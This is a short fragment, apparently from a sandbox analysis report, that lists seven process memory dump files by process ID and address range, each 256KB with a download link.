memory/2628-40-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2664-38-0x00000000025A0000-0x00000000025E0000-memory.dmp

Filesize
256KB

Download
memory/2664-87-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2696-85-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2984-0-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2984-88-0x0000000000400000-0x0000000000440000-memory.dmp

Filesize
256KB

Download
memory/2984-25-0x0000000002B60000-0x0000000002BA0000-memory.dmp

Filesize
256KB

Download